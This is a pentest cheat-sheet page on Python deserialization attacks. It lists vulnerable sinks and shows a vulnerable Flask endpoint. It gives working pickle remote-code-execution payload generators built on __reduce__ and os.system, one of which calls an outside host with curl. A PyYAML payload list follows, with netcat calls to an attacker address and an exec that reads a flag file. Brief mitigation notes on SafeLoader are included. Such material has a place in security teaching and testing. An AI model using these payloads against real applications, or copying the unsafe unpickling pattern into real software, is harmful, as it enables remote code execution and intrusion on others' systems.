Skip to main content

python

Python

Python Deserialization

Python deserialization is the process of reconstructing Python objects from serialized data, commonly done using formats like JSON, pickle, or YAML. The pickle module is a frequently used tool for this in Python, as it can serialize and deserialize complex Python objects, including custom classes.


Tool of Trade

j0lt-github/python-deserialization-attack-payload-generator - Serialized payload for deserialization RCE attack on python driven applications where pickle,PyYAML, ruamel.yaml or jsonpickle module is used for deserialization of serialized data.


Methodology

In Python source code, look for these sinks:

  • cPickle.loads
  • pickle.loads
  • _pickle.loads
  • jsonpickle.decode

Pickle

Consider a Python web server built using the standard library’s http.server module. A developer might be tempted to unpickle data received in a request for convenience.

import pickle
from flask import Flask, request
import io

app = Flask(__name__)

@app.route("/deserialize", methods=["POST"])
def deserialize():
# Attacker controls request body
raw_data = request.data
obj = pickle.load(io.BytesIO(raw_data))
return str(obj)

In this example, the call to pickle.load is applied directly to data derived from user input. If an attacker crafts a malicious pickle string, it will be executed when the handler processes the request. This is precisely the kind of pattern Semgrep’s rules can detect. The rules track data flow from untrusted sources such as HTTP request paths or headers and flag places in the code where it when it reaches sensitive functions like pickle.loads. Semgrep currently covers over a dozen Python libraries with known insecure deserialization functions.

Lets now look at attacker workflow:

The following code is a simple example of using cPickle in order to generate an auth_token which is a serialized User object.

danger

import cPickle will only work on Python 2

import cPickle
from base64 import b64encode, b64decode

class User:
def __init__(self):
self.username = "anonymous"
self.password = "anonymous"
self.rank = "guest"

h = User()
auth_token = b64encode(cPickle.dumps(h))
print("Your Auth Token : {}").format(auth_token)

The vulnerability is introduced when a token is loaded from an user input.

new_token = raw_input("New Auth Token : ")
token = cPickle.loads(b64decode(new_token))
print "Welcome {}".format(token.username)

Python 2.7 documentation clearly states Pickle should never be used with untrusted sources. Let's create a malicious data that will execute arbitrary code on the server.

info

The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

import cPickle, os
from base64 import b64encode, b64decode

class Evil(object):
def __reduce__(self):
return (os.system,("whoami",))

e = Evil()
evil_token = b64encode(cPickle.dumps(e))
print("Your Evil Token : {}").format(evil_token)
info

For python3 use pickle and not cPickle.

import pickle
import os
from base64 import b64encode, b64decode

class Hack(object):
def __reduce__(self):
return (os.system, ("curl https://ip:6699/",))

h = Hack()
token = b64encode(pickle.dumps(h))
## token = b64encode(pickle.dumps(h,2)) # To use against python2 use this line and comment above
print(f"Your Evil Token is: {token}")

PyYAML

YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures.

!!python/object/apply:time.sleep [10]
!!python/object/apply:builtins.range [1, 10, 1]
!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
!!python/object/new:subprocess [["ls","-ail"]]
!!python/object/new:subprocess.check_output [["ls","-ail"]]
!!python/object/apply:subprocess.Popen
- ls
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state:
update: !!python/name:exec

Since PyYaml version 6.0, the default loader for load has been switched to SafeLoader mitigating the risks against Remote Code Execution. PR #420 - Fix

The vulnerable sinks are now yaml.unsafe_load and yaml.load(input, Loader=yaml.UnsafeLoader).

with open('exploit_unsafeloader.yml') as file:
data = yaml.load(file,Loader=yaml.UnsafeLoader)